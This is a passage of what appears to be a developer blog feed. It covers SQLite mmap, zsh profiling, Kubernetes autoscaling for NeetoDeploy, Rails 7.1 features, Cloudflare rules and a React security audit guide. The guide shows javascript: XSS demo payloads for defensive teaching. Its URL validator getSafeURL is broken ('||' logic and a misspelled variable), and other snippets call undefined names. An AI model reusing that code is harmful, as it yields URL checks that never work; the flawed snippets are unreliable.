I/O is an OS-provided feature that maps the contents of afile on secondary storage into a programs address space. The program thenaccesses pages via pointers as if the file resided entirely in memory. The OStransparently loads pages only when the program references them andautomatically evicts pages if memory fills up. The advantage of using mmap is thatit bypasses the step where we need to copy the pages from secondary to primarystorage, thereby making it faster.</p><p><strong>How is memory-mapped I/O implemented in SQLite?</strong></p><p>SQLite accesses and updates database files using <code>xRead()</code> and <code>xWrite()</code>methods by default. These methods are typically implemented as <code>read()</code> and<code>write()</code> system calls, which cause the OS to copy disk content between thekernel buffer cache and user space. SQLite also has the option of accessing diskcontent directly using memory-mapped I/O via the <code>xFetch()</code> and <code>xUnfetch()</code>methods. Using the legacy <code>xRead()</code> method in SQLite, a page-sized heap memoryblock is allocated, and the <code>xRead()</code> call copies the entire database pagecontent into this allocated memory. Whereas if memory-mapped I/O is enabled, itcalls the <code>xFetch()</code> method. The <code>xFetch()</code> method asks the operating system toreturn a pointer to the requested page. If the requested page has been or can bemapped into the application address space, then <code>xFetch()</code> returns a pointer tothat page for SQLite to use without having to copy anything. Skipping the copystep is what makes memory-mapped I/O faster.</p><p>The <code>mmap_size</code> is the maximum number of bytes of the database file that SQLitewill try to map into the process address space at one time. Now it is set to128MB.</p><p>With these changes, there is a considerable improvement in performance. Thatbeing said, SQLite makes a strong case for single-node production applications,as it is highly performant, especially when used in conjunction with NVMe disks.</p><p>Please check out this <a href="https://github.com/rails/rails/pull/49349">pull request</a>for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Profiling your zsh setup with zprof]]></title>
       <author><name>Sreeram Venkitesh</name></author>
      <link href="https://www.bigbinary.com/blog/zsh-profiling"/>
      <updated>2023-10-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/zsh-profiling</id>
      <content type="html"><![CDATA[<p>While using frameworks like <a href="https://ohmyz.sh/">oh-my-zsh</a> to upgrade yourshell, it is pretty easy to get carried away with all the available plugins.This can eventually take a toll on your shells performance. One significant wayit can affect your workflow is by slowing everything down. The more items youadd to your <code>.zshrc</code> file, the more time your shell will need to start up.Profiling your shell is a good start to figuring out what is slowing it down.</p><h3>zprof</h3><p><a href="https://zsh.sourceforge.io/Doc/Release/Zsh-Modules.html#The-zsh_002fzprof-Module">zprof</a>is a utility that comes packaged with zsh, which you can use to profile your zshscript.</p><p>Add the following to the top of your <code>.zshrc</code> file to load zprof.</p><pre><code class="language-bash">zmodload zsh/zprof</code></pre><p>At the bottom of your <code>.zshrc</code>, add the following.</p><pre><code class="language-bash">zprof</code></pre><p>This would profile your zsh script and print a summary of all the commands runduring your shell startup and the time it takes to execute them. Run <code>exec zsh</code>to apply the changes and restart your shell. Your shell will print somethinglike this:</p><p><img src="/blog_images/2023/zsh-profiling/zprof-output.png" alt="Output of the zprof command"></p><p>With this you can see which commands are taking the most time to load. Enablingprofiling has helped pinpoint the issue and now you can look into fixing it. Inthe above example, you can see that nvm is taking up a considerable amount oftime.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Optimizing NeetoDeploy's Cluster Autoscaler]]></title>
       <author><name>Sreeram Venkitesh</name></author>
      <link href="https://www.bigbinary.com/blog/optimizing-neeto-deploy-autoscaler"/>
      <updated>2023-10-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/optimizing-neeto-deploy-autoscaler</id>
      <content type="html"><![CDATA[<p>Once we<a href="https://bigbinary.com/blog/solving-scalability-in-neeto-deploy">configured the Cluster Autoscaler</a>to scale NeetoDeploy according to the load, the next challenge was how to dothis efficiently. The primary issue we had to solve was to reduce the time wehad to wait for the nodes to scale up.</p><h2>Challenges faced</h2><p>The Cluster Autoscaler works by monitoring the pods and checking if they arewaiting to get scheduled. If no nodes are available to schedule the waitingpods, they will be in <code>Pending</code> state, until the <code>kube-scheduler</code> finds asuitable node.</p><p>With our default Cluster Autoscaler setup, if a pod is provisioned when thecluster is at maximum capacity, the pod will go into <code>Pending</code> state and remainthere until the cluster has scaled up. This entire flow consists of thefollowing steps:</p><ul><li>The Cluster Autoscaler scans the pods and identifies the un-schedulable pods.</li><li>The Cluster Autoscaler provisions a new node. We have configured theautoscaler deployment with the necessary permissions for the autoscalinggroups in EC2, with which the autoscaler can provision new EC2 machines.</li><li>Kubernetes adds the newly provisioned node to the clusters control plane, andthe cluster is scaled up.</li><li>The pending pod gets scheduled to the newly added node.</li></ul><p>From the perspective of a user who wants to get their application deployed, aconsiderable amount of time is taken to complete all these steps in addition tothe time taken to build and release their code. We can only optimize it so muchby decreasing the scan interval of the Cluster Autoscaler. We need a mechanismby which we can always have some buffer nodes ready so that the usersdeployments never go into <code>Pending</code> state and wait for the nodes to beprovisioned.</p><h2>Pod Priority, Preemption and Overprovisioning</h2><p>Kubernetes allows us to assign different priorities to pods. By default, all thepods have a priority of <code>0</code>. When a pod is scheduled, it can preempt or evictother pods with lower priority than itself and take its place. We will use thisfeature of pod preemption to reserve resources for incoming deployments.</p><p>We created a new pod priority class with a priority of <code>-1</code> and used this tooverprovision<a href="https://www.ianlewis.org/en/almighty-pause-container">pause pods</a>. We allocateda fixed amount of CPU and memory resources to these pause pods. The pausecontainer is a placeholder container used by Kubernetes internally and doesntdo anything by itself.</p><p><img src="/blog_images/2023/optimizing-neeto-deploy-autoscaler/overprovisioned-cluster.png" alt="Illustration of overprovisioning a Kubernetes cluster"></p><p>Now if the cluster is at full capacity and a new deployment is created,technically the newly created pod doesn't have space to be scheduled in thecluster. In normal cases, this would warrant a scale-up to be triggered by theCluster Autoscaler and the pod would be <code>Pending</code> until the new node isprovisioned and attached to the cluster.</p><p><img src="/blog_images/2023/optimizing-neeto-deploy-autoscaler/overprovisioner-stage-1.png" alt="Illustration of a new pod getting created in an overprovisioned cluster"></p><p>We can save a lot of time from this process since we have the overprovisionedpods with a lower pod priority. The newly created deployment would have a podpriority of <code>0</code> by default, and our placeholder pause pods with a priority of<code>-1</code> would be evicted in favor of this application pod. This means that new podscan be scheduled without having to wait for the Cluster Autoscaler to do itsmagic. Some space would always be reserved in our cluster.</p><p><img src="/blog_images/2023/optimizing-neeto-deploy-autoscaler/overprovisioner-stage-2.png" alt="Illustration of a pod evicting an overprovisioning pod with lesser priority"></p><p>The pause pods would now move to <code>Pending</code> state after being evicted, which theCluster Autoscaler will pick up, and it will start provisioning a new node. Thisway, the autoscaler doesnt have to wait for a user to create a new deploymentto scale up the cluster. Instead, it would do it in advance to reserve somespace for potential deployments.</p><p><img src="/blog_images/2023/optimizing-neeto-deploy-autoscaler/overprovisioner-stage-3.png" alt="Illustration of how an evicted overprovisioning pod triggering cluster scale up"></p><h2>Trade-offs</h2><p>Now that we have the overprovisioning deployments configured to reserve somespace in NeetoDeploy's cluster, we had to decide how much space to reserve. Ifwe increase the CPU and memory limit for the overprovisioning pods or theirnumber of replicas, we will have more space reserved in our cluster. This meansthat we can handle more user deployments concurrently, but we will incur thecost of keeping the extra buffer running. The trade-off here is between the costwe are willing to pay and the load we want to handle.</p><p>For running NeetoDeploy, we started with three copies of overprovisioning podswith 500 milli vCPUs, and later scaled it to 10 replicas after we moved thereview apps of all the <a href="https://neeto.com">Neeto products</a> to NeetoDeploy. Wehave been running all our internal staging deployments and review apps for thepast eleven months, and this configuration has been working pretty well for usso far.</p><p>If your application runs on Heroku, you can deploy it on NeetoDeploy without anychange. If you want to give NeetoDeploy a try, then please send us an email at<a href="mailto:invite@neeto.com">invite@neeto.com</a>.</p><p>If you have questions about NeetoDeploy or want to see the journey, followNeetoDeploy on <a href="https://twitter.com/neetodeploy">Twitter</a>. You can also join our<a href="https://launchpass.com/neetohq">community Slack</a> to chat with us about anyNeeto product.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 adds support for multi-column ordering in ActiveRecord::Batches]]></title>
       <author><name>Navaneeth D</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-1-adds-support-for-multi-column-ordering-in-activerecord-batches"/>
      <updated>2023-10-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-1-adds-support-for-multi-column-ordering-in-activerecord-batches</id>
      <content type="html"><![CDATA[<p>In Rails 7.1, an enhancement has been introduced to<a href="https://edgeapi.rubyonrails.org/classes/ActiveRecord/Batches.html"><code>ActiveRecord::Batches</code></a>methods, related to models with composite primary keys. This update allowsdevelopers to specify ascending or descending order for each key within acomposite primary key.</p><h3>Before Rails 7.1</h3><p>In Rails versions prior to 7.1, when batch processing records with a compositeprimary key, like <code>id_1</code> and <code>id_2</code>, developers could use the <code>:asc</code> or <code>:desc</code>argument to control the sorting order. However, there was a limitation in howthis sorting worked. When you specified the sorting order using <code>:asc</code> or<code>:desc</code>, it affected both <code>id_1</code> and <code>id_2</code> simultaneously. In other words, ifyou requested ascending order, both <code>id_1</code> and <code>id_2</code> would be sorted inascending order together. Similarly, if you requested descending order, both<code>id_1</code> and <code>id_2</code> would be sorted in descending order together.</p><p>This limitation had practical implications, especially when you needed to sortrecords by different criteria for each part of the composite primary key.</p><h3>After Rails 7.1</h3><p>With the new enhancement in Rails 7.1, developers can now select the sortingorder for each key within a composite primary key. Let's see this with anexample.</p><p>Consider a scenario where you have a <code>Product</code> model with a composite primarykey, <code>category_id</code> and <code>product_id</code>. You want to fetch products in descendingorder of <code>category_id</code> and ascending order of <code>product_id</code>. With Rails 7.1, thisbecomes straightforward:</p><pre><code class="language-ruby">class Product &lt; ActiveRecord::Base  self.primary_key = [:category_id, :product_id]end# Retrieving products in descending order of# category_id and ascending order of product_idProduct.find_each(order: [:desc, :asc]) do |product|  # Your processing logic for each product goes hereend</code></pre><p>The<a href="https://edgeapi.rubyonrails.org/classes/ActiveRecord/Batches.html#method-i-find_each"><code>find_each</code></a>method is a part of <code>ActiveRecord::Batches</code> and is used for efficient batchprocessing of records from the database. It retrieves records in small batches,reducing memory consumption and improving performance. The method takes anoptional <code>order</code> argument, which, as of Rails 7.1, can accept an array ofsymbols to specify the sorting order for each key within the composite primarykey.</p><p>The enhancement for specifying sorting orders for composite primary keys is notlimited to <code>find_each</code>. It applies to other batch processing methods provided by<code>ActiveRecord::Batches</code>, suchas<a href="https://edgeapi.rubyonrails.org/classes/ActiveRecord/Batches.html#method-i-find_in_batches"> <code>find_in_batches</code></a>and<a href="https://edgeapi.rubyonrails.org/classes/ActiveRecord/Batches.html#method-i-in_batches"><code>in_batches</code></a>.These methods allow you to retrieve and process records in batches efficiently,just like <code>find_each</code>.</p><h3>Conclusion</h3><p>In Rails 7.1, the support for multiple-column ordering in batches for modelswith composite primary keys brings more flexibility and control to yourapplication's data retrieval process. Now you can tailor the sorting ofcomposite keys to match your specific needs, providing a more powerful andversatile toolset for your Rails development endeavors.</p><p>Please check out this <a href="https://github.com/rails/rails/pull/48268">pull request</a>for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 adds *_deliver callbacks to Action Mailer]]></title>
       <author><name>Calvin Chiramal</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-1-adds-_-deliver-callbacks-to-action-mailer"/>
      <updated>2023-09-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-1-adds-_-deliver-callbacks-to-action-mailer</id>
      <content type="html"><![CDATA[<p>Rails 7.1 has added *_deliver callbacks to Action Mailer. Let's understand theuse of these callbacks with an example. Consider a case where you want to sendan email after a user has signed up.</p><pre><code class="language-ruby">class UserMailer &lt; ApplicationMailer  default from: 'notifications@neeto.com'  def welcome_email    @user = params[:user]    mail(to: @user.email, subject: 'Welcome to neeto')  endend</code></pre><p>When the <code>mail</code> method is called in the above code, it just renders the mailtemplate from a view. The mail is actually not sent. The actual delivery mayhappen synchronously or asynchronously. To send the mail, we need to call one ofmany deliver methods.</p><pre><code class="language-ruby">UserMailer.with(user: @user).welcome_email.deliver_later</code></pre><p>Before Rails 7.1, we did not have any callbacks around the deliver methods toexecute code around the delivery lifecycle. You would need to use<a href="https://guides.rubyonrails.org/action_mailer_basics.html#intercepting-and-observing-emails">interceptors and observers</a>to hook into the mail delivery lifecycle. Say, you need to send emails to only afew allowed email addresses in the staging environment. You would need to use aninterceptor and register it to Action Mailer.</p><pre><code class="language-ruby"># interceptors/staging_email_interceptor.rbmodule Interceptors  class StagingEmailInterceptor    def self.delivering_email(mail)      if rails.env.staging? &amp;&amp; !allowed_emails.include?(mail.to)        mail.perform_deliveries = false      end    end  endend</code></pre><pre><code class="language-ruby"># config/initializers/action_mailer.rbActionMailer::Base.register_interceptor(Interceptors::StagingEmailInterceptor)</code></pre><p>The new <code>before_deliver</code> callback allows you to handle this situation withoutusing the Interceptors or Observers. You would just need to include thefollowing in <code>UserMailer</code>.</p><pre><code class="language-ruby">class UserMailer &lt; ApplicationMailer  default from: 'notifications@neeto.com'  before_deliver :filter_allowed_emails  def welcome_email    @user = params[:user]    mail(to: @user.email, subject: 'Welcome to neeto')  end  private    def filter_allowed_emails      if rails.env.staging? &amp;&amp; !allowed_emails.include?(mail.to)        mail.perform_deliveries = false      end    endend</code></pre><p>Similarly, suppose you want to update the <code>mail_delivered_at</code> attribute of the<code>user</code> instance, you would have to use an observer and register it like so:</p><pre><code class="language-ruby"># observers/staging_email_interceptor.rbmodule Observers  class SetDeliveredAtObserver    def self.delivered_email(mail)      user = User.find_by(email: mail.to)      user.update(mail_delivered_at: mail.date)    end  endend</code></pre><pre><code class="language-ruby"># config/initializers/action_mailer.rbActionMailer::Base.register_interceptor(Interceptors::StagingEmailInterceptor)ActionMailer::Base.register_observer(Observers::SetDeliveredAtObserver)</code></pre><p>With the new <code>after_deliver</code> callback this becomes as simple as defining amethod in <code>UserMailer</code>.</p><pre><code class="language-ruby">class UserMailer &lt; ApplicationMailer  default from: 'notifications@neeto.com'  before_deliver :filter_allowed_emails  after_deliver :set_delivered_at  def welcome_email    @user = params[:user]    mail(to: @user.email, subject: 'Welcome to neeto')  end  private    def filter_allowed_emails      if rails.env.staging? &amp;&amp; !allowed_emails.include?(mail.to)        mail.perform_deliveries = false      end    end    def set_delivered_at      @user.update(mail_delivered_at: mail.date)    endend</code></pre><p>An important thing to keep in mind is the order of execution of the callbacks.</p><ul><li>before_action</li><li>after_action</li><li>before_deliver</li><li>after_deliver</li></ul><p>This makes sense as the deliver callbacks only wrap around the deliver methodswhile the action callbacks wrap around the mail render method.</p><p>Please check out this <a href="https://github.com/rails/rails/pull/47630">pull request</a>for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Handling domain redirection while maintaining different google crawl attributes using Cloudflare]]></title>
       <author><name>Ghouse Mohamed</name></author>
      <link href="https://www.bigbinary.com/blog/domain-redirection-using-cloudflare"/>
      <updated>2023-08-31T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/domain-redirection-using-cloudflare</id>
      <content type="html"><![CDATA[<p><a href="https://neeto.com">neeto</a> is a collection of different software. Each neetoproduct gets its own page. For example, NeetoCal gets the URLhttps://www.neeto.com/neetocal.</p><p>When it comes to actually using these products, you will be redirected to<code>https://subdomain.neetocal.com</code>. Here, &quot;subdomain&quot; would be the subdomainallocated to you when you signed up for Neeto.</p><p>We planned to add &quot;Google sign in&quot; feature to make it easier for folks toboth signup and to log in. During testing, it all worked fine. However, when weasked &quot;Google&quot; to approve the app &quot;NeetoCal&quot; for &quot;Google sign in&quot; Googledemanded that our users should be able to see the &quot;Privacy Policy&quot; and &quot;Terms ofconditions&quot; on the website. In order to make Google happy, we added a redirectionfrom &quot;neetocal.com&quot; to &quot;neeto.com/neetocal&quot;.</p><p>However, Google was not happy with it. The users are logging into<code>https://subdomain.neetocal.com</code> so the &quot;privacy policy&quot; and &quot;terms of service&quot;should be visible on the domain &quot;neetocal.com&quot; itself.</p><p>We are using Cloudflare as our DNS provider. Using the tools provided to us byCloudflare we decided to show the content of &quot;neeto.com/neetocal&quot; on&quot;neetocal.com&quot; without redirecting the user.</p><p>Note that in this case, if you type &quot;neetocal.com&quot;, then you will see the URLchange to &quot;neetocal.com/neetocal&quot; instantly. That's because the URL of the mainmarketing site is &quot;neeto.com/neetocal&quot;.</p><p>Cloudflare provides<a href="https://developers.Cloudflare.com/support/page-rules/understanding-and-configuring-Cloudflare-page-rules-page-rules-tutorial/">Page rules</a>which we will be using to achieve our goals. Below is a video of how it was done.</p><p>&lt;iframewidth=&quot;100%&quot;height=&quot;315&quot;src=&quot;https://www.youtube.com/embed/RodZIBxYBHc&quot;frameborder=&quot;0&quot;allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot;allowfullscreen</p><blockquote><p>&lt;/iframe&gt;</p></blockquote><h2>SEO duplicate content issue</h2><p>The Google search engine doesn't like it when we show exactly the same contenton two different domains. Google thinks that the site is trying to cheat Googleand Google will punish both sites.</p><p>We want Google to index our main marketing site https://neeto.com/neetocal andwe want Google to ignore &quot;neetocal.com&quot;. One way to tell Google not index thesite is by adding a <code>noindex</code><a href="https://developers.google.com/search/docs/crawling-indexing/robots-meta-tag#noindex">meta tag</a>.</p><pre><code>&lt;meta name=&quot;robots&quot; content=&quot;noindex&quot;&gt;</code></pre><p>In the above example, we are asking all bots not to index the page containingthe above meta tag.</p><p>We planned to inject this meta tag when a page is rendered for the URL&quot;neetocal.com&quot; and we will not inject this tag when the page is rendered for the URL&quot;neeto.com&quot;.</p><p>Upon more research, we found that search engines also look at the responseheaders. Given below is the sequence that search engines follow for indexing theweb pages.</p><ul><li>Crawler gets the raw page source as a response to the HTTP request.</li><li>Crawler checks if <code>x-robots-tag: noindex, nofollow</code> header is present in theresponse.</li><li>Crawler checks the meta tags to determine if the page needs to be indexed ornot.</li></ul><p>If a page has <code>x-robot-tag: noidex, nofollow</code> then the crawler will not indexthe page.</p><p>Based on this information, we decided to use<a href="https://developers.Cloudflare.com/rules/transform/response-header-modification/">Response Header Modification Rules</a>feature of Cloudflare. Below is a video of how it was done.</p><p>&lt;iframewidth=&quot;100%&quot;height=&quot;315&quot;src=&quot;https://www.youtube.com/embed/0AFeM2yyg_A&quot;frameborder=&quot;0&quot;allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot;allowfullscreen</p><blockquote><p>&lt;/iframe&gt;</p></blockquote>]]></content>
    </entry><entry>
       <title><![CDATA[Solving scaling challenges in NeetoDeploy using Cluster Autoscaler]]></title>
       <author><name>Sreeram Venkitesh</name></author>
      <link href="https://www.bigbinary.com/blog/solving-scalability-in-neeto-deploy"/>
      <updated>2023-08-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/solving-scalability-in-neeto-deploy</id>
      <content type="html"><![CDATA[<p>We are building <a href="https://www.neeto.com/neetodeploy">NeetoDeploy</a>. It's a Herokualternative. Check out our previous blog to see<a href="https://www.bigbinary.com/blog/neeto-deploy-zero-to-one">how we started</a>building NeetoDeploy.</p><p>We started using NeetoDeploy internally for all our staging applications and the&quot;pull request review&quot; applications. Very soon, we ran into scaling challenges.Some days, we have too many pull requests, and some days, very few pullrequests. Some days, the staging sites have an extra load.</p><p>Scaling is a fundamental problem in container orchestration. We need to ensurethat we have enough computing resources to handle the load, and at the sametime, we need to make sure we are not spending money on resources that are notbeing utilized. If we need to run 10 applications, we should only have to payfor as much computing as is required for running 10 applications. But if thisnumber increases to 100 one day, our system should be able to provision newcomputing resources.</p><h2>Understanding Kubernetes Autoscalers</h2><p>When we need to scale, we can manually allocate resources. This istime-consuming and repetitive. Kubernetes excels in autoscaling. It providesmany different options to meet our scaling needs.</p><p>We can define autoscalers of different types to make our cluster and ourdeployments scale up or down based on various parameters and handle trafficgracefully. Kubernetes has three kinds of autoscalers operating at differentlevels.</p><h3>Horizontal Pod Autoscaler (HPA)</h3><p>The Horizontal Pod Autoscaler can scale up our Kubernetes deployments byincreasing the number of copies of our app's container, known as<a href="https://kubernetes.io/docs/concepts/workloads/controllers/replicaset/">replicas</a>.We can configure our Horizontal Pod Autoscaler to scale up our apps based onmetrics like increased memory usage, network load, or even the time of the daywhen we expect more traffic. Incoming traffic would be redirected to any of thereplicas and Kubernetes takes care of this.</p><p><img src="/blog_images/2023/solving-scalability-in-neeto-deploy/hpa.png" alt="Illustration of how horizontal pod autoscaling works"></p><h3>Vertical Pod Autoscaler (VPA)</h3><p>The Vertical Pod Autoscaler takes a different approach to the same problemsolved by the Horizontal Pod Autoscaler. The Vertical Pod Autoscaler increasesthe CPU and memory resources allocated to our pod based on the load. The numberof containers running would remain the same, but they would have more resourcesto work with and, hence, would be able to handle increased loads.</p><p><img src="/blog_images/2023/solving-scalability-in-neeto-deploy/vpa.png" alt="Illustration of how vertical pod autoscaling works"></p><h3>Cluster Autoscaler</h3><p>While horizontal and vertical pod autoscaling operate on the level of individualdeployments, the Cluster Autoscaler scales in the context of the entire cluster.It increases or decreases the number of nodes in the cluster, making space formore deployments.</p><h2>The need for Cluster Autoscaler</h2><p>Suppose our Kubernetes cluster has three nodes. When we create deployments, ourapplications will be deployed to any of these three nodes based on the resourceavailability in the nodes. Without the Cluster Autoscaler, the number ofmachines running in our cluster will be fixed at 3.</p><p>If there is a sudden surge in traffic and we have to deploy 100 apps instead of10, the resources needed would overflow the three nodes' combined CPU and memoryresources. Essentially, our cluster will not have enough resources toaccommodate all the deployments, and the pods for our deployments will be stuckin the <code>Pending</code> state.</p><h2>How Cluster Autoscaler works</h2><p>The Cluster Autoscaler increases and decreases the number of nodes in ourcluster based on the number of deployments created. So in the above example, ifwe had the Cluster Autoscaler running, it would check if any pods are stuck in a<code>Pending</code> state, and if so, it'll spawn a new node in the cluster. If threenodes are not enough to accommodate all our deployments, the Cluster Autoscalerwould detect this and scale the cluster to four nodes.</p><p><strong>Let us see step by step how cluster autoscaler would work:</strong></p><ol><li>If our Kubernetes cluster is running at full capacity, the pods of a newlycreated deployment would have no space to fit in the cluster. In this case,the pod would be stuck in the <code>Pending</code> state and wouldn't be &quot;scheduled&quot; toany node.</li></ol><p><img src="/blog_images/2023/solving-scalability-in-neeto-deploy/cluster-autoscaler-1.png" alt="Illustration of pod stuck in pending state"></p><ol start="2"><li>The Cluster Autoscaler keeps checking if there are unscheduled pods. If so,the Cluster Autoscaler triggers a scale-up by provisioning a new node andattaching it to the cluster.</li></ol><p><img src="/blog_images/2023/solving-scalability-in-neeto-deploy/cluster-autoscaler-2.png" alt="Illustration of cluster autoscaler provisioning a new node"></p><ol start="3"><li>Once the new node has been provisioned, the capacity of the cluster hasincreased, and the pod, which was previously in the <code>Pending</code> state, will bescheduled to the newly created node.</li></ol><p><img src="/blog_images/2023/solving-scalability-in-neeto-deploy/cluster-autoscaler-3.png" alt="Illustration of the pending pod being scheduled to the newly provisioned node"></p><p>The same thing can happen in reverse as well. Consider the case wheredeployments are deleted or scaled down, and our nodes are not utilizedcompletely.</p><p><img src="/blog_images/2023/solving-scalability-in-neeto-deploy/cluster-autoscaler-4.png" alt="Illustration of nodes being under-utilized"></p><p>In such a scenario, the Cluster Autoscaler would scale down the nodes so thatonly the minimum required resources are running. Existing deployments fromdifferent nodes would be rescheduled and &quot;packed&quot; into a smaller number of nodesbefore the unwanted machines are terminated. The Cluster Autoscaler marks unusednodes as <code>SchedulingDisabled</code> so that no pods are scheduled or moved into thisnode.</p><p><img src="/blog_images/2023/solving-scalability-in-neeto-deploy/cluster-autoscaler-6.png" alt="Illustration of how pods are packed into minimum number required"></p><p>The Cluster Autoscaler then unprovisions the unused node.</p><p><img src="/blog_images/2023/solving-scalability-in-neeto-deploy/cluster-autoscaler-7.png" alt="Illustration of how unused nodes are unprovisioned"></p><p>The Cluster Autoscaler ensures that the cluster is in a stable state where nopods are stuck in the <code>Pending</code> state, and no under-utilized resources are keptrunning. By default, the Cluster Autoscaler checks for pending pods and scalesdown candidates every 10 seconds, but we can configure this to increase ordecrease the speed at which the cluster autoscales.</p><h2>Deploying the Cluster Autoscaler</h2><p>The code for Cluster Autoscaler is available at<a href="https://github.com/kubernetes/autoscaler">kubernetes/autoscaler</a>, and this canbe used to set up Cluster Autoscaler with any Kubernetes cluster.</p><p>All major cloud platforms like AWS, GCP, Azure, and DigitalOcean have ClusterAutoscaler support in their managed Kubernetes services. For example, if theCluster Autoscaler is deployed on Amazons Elastic Kubernetes Service (EKS). Itwould spawn new EC2 instances as needed and attach them to the EKS clusterscontrol plane. The complete list of all cloud providers is<a href="https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler#deployment">here</a>.</p><p>Since we are running NeetoDeploy on EKS, we referred to the documentation forsetting up autoscaler with EKS and created an OIDC identity provider in IAM. Wethen created an IAM policy for using the autoscaler with the necessarypermissions, such as <code>DescribeAutoScalingGroups</code> for describing autoscalinggroups in AWS and <code>setDesiredCapacity</code> to change the desired limit of nodes inthe cluster, etc.</p><p>We then created an IAM role with the IAM policy and OIDC provider createdearlier and used this role to set up RBAC in the cluster, along with the ClusterAutoscaler deployment. This ensures that the Cluster Autoscaler deployment hasall the permissions it needs for inspecting pending pods and working with nodes.</p><h2>Seeing the autoscaler in action</h2><p>Once all of this was done, we tried creating multiple deployments with moresignificant memory and CPU limits consecutively to see if the cluster couldhandle the increased load. Even though the autoscaler took some time to react tothe increased load, the cluster was getting scaled up according to therequirement, and none of the pods were stuck in the <code>Pending</code> state for long.Once we deleted our test deployments, the cluster automatically scaled backdown.</p><p>If your application runs on Heroku, you can deploy it on NeetoDeploy without anychange. If you want to give NeetoDeploy a try, then please send us an email at<a href="mailto:invite@neeto.com">invite@neeto.com</a>.</p><p>If you have questions about NeetoDeploy or want to see the journey, followNeetoDeploy on <a href="https://twitter.com/neetodeploy">Twitter</a>. You can also join our<a href="https://launchpass.com/neetohq">community Slack</a> to chat with us about anyNeeto product.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Audit of Your React Application & Safeguarding Your Web App]]></title>
       <author><name>Ajmal Noushad</name></author>
      <link href="https://www.bigbinary.com/blog/conducting-frontend-security-audit"/>
      <updated>2023-08-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/conducting-frontend-security-audit</id>
      <content type="html"><![CDATA[<h2>Introduction</h2><p>In the realm of web development, securing web applications is paramount toprotect user data and ensure the integrity of the system. Regular frontendsecurity audits are essential to identify and address vulnerabilities. In thisblog post, we will explore the process of performing a frontend security auditspecifically for React applications. We will highlight key areas to focus on toenhance the security of your React codebase.</p><h3>1. Verify the usage of dependencies</h3><p>Begin the frontend security audit by scrutinizing the dependencies used in yourReact application. Remove any unused dependencies to minimize potential attackvectors. Stay updated with the latest security patches and regularly update thedependencies to mitigate known vulnerabilities.</p><h3>2. Audit dependencies for security vulnerabilities</h3><p>Leverage tools like <code>yarn audit</code> or <code>npm audit</code> to scan your dependencies forany known security vulnerabilities. Stay vigilant in addressing thesevulnerabilities promptly by updating to the latest secure versions or seekingalternative libraries when necessary.</p><h3>3. Guard against cross-site scripting (XSS)</h3><p>React is mostly safe from XSS attacks. Because under the hood, it has built-inprotection against XSS attacks. React automatically encodes any user inputbefore rendering it, ensuring that user input is never executed as code. Thisfeature makes React almost inherently secure in terms of XSS vulnerabilities.</p><p>However, we can still choose to render user provided html and scripts through<code>dangerouslySetInnerHtml</code> prop or using libraries like <code>html-react-parser</code> or<code>html-to-react</code>. While doing this, we should be very careful to use it only whenIt is absolutely necessary to make sure we are sanitizing the raw HTML using alibrary like <code>Dompurify</code>.</p><pre><code class="language-jsx">import DOMPurify from &quot;dompurify&quot;;import htmlReactParser from &quot;html-react-parser&quot;;import { Parser as HtmlToReactParser } from &quot;html-to-react&quot;;const htmlToReactParser = new HtmlToReactParser();const UnsafeComponent = userProvidedHtml =&gt; {  return (    &lt;&gt;      &lt;div dangerouslySetInnerHTML={{ __html: userProvidedHtml }} /&gt;      &lt;div&gt;{htmlReactParser(userProvidedHtml)}&lt;/div&gt;      &lt;div&gt;{htmlToReactParser.parse(userProvidedHtml)}&lt;/div&gt;    &lt;/&gt;  );};const SafeComponent = userProvidedHtml =&gt; {  const sanitizedHtml = DOMPurify.sanitize(userProvidedHtml);  return (    &lt;&gt;      &lt;div dangerouslySetInnerHTML={{ __html: sanitizedHtml }} /&gt;      &lt;div&gt;{htmlReactParser(sanitizedHtml)}&lt;/div&gt;      &lt;div&gt;{htmlToReact(sanitizedHtml)}&lt;/div&gt;    &lt;/&gt;  );};</code></pre><p>Another XSS attack surface in React is URLs provided to anchor tags. Reactdoesnt escape strings provided as HTML attribute props. So strings like<code>javascript:alert(0)</code> would trigger the JavaScript code when passed to <code>href</code>prop of an anchor tag.</p><p>For example the below anchor tag would trigger a browser alert dialog whenclicked.</p><pre><code class="language-jsx">&lt;a href=&quot;javascript:alert(0)&quot;&gt;Click me&lt;/a&gt;</code></pre><p>Similarly, the code below would also trigger a browser alert dialog.</p><pre><code class="language-js">window.location.href = &quot;javascript:alert(0)&quot;;</code></pre><p>We have to be careful when using links inputted by users to render links orredirect to them by setting <code>window.location.href</code>. To prevent the code fromexecuting, we can use backend validations to make sure the links are valid andsafe to use. For additional safety we could implement a whitelist of allowedprotocols like <code>https</code> and <code>http</code> and reject all other protocols on thefrontend.</p><pre><code class="language-js">const getSafeURL = url =&gt; {  const parsed = new URL(url);  if (parsed.protocol !== &quot;https:&quot; || paresed.protocol !== &quot;http:&quot;) return;  return url;};</code></pre><p>Inspect links and redirect logic in your frontend code for potential cross-sitescripting vulnerabilities. Validate user-inputted URLs to prevent unauthorizedexecution of malicious code. Implement measures to sanitize and escapeuser-generated content properly.</p><h3>4. Verify the necessity of third-party scripts</h3><p>Examine the 3rd party scripts included in your web application and verify theirnecessity. Remove any unused or unnecessary scripts, reducing the attack surfaceand potential risks.</p><h3>5. Load assets over secure protocols</h3><p>Ensure that all assets, such as images, fonts, and stylesheets, and external scriptsare loaded over secure protocols such as <code>https</code>. Loading even a single assetover insecure protocols like <code>http</code> can expose your application to 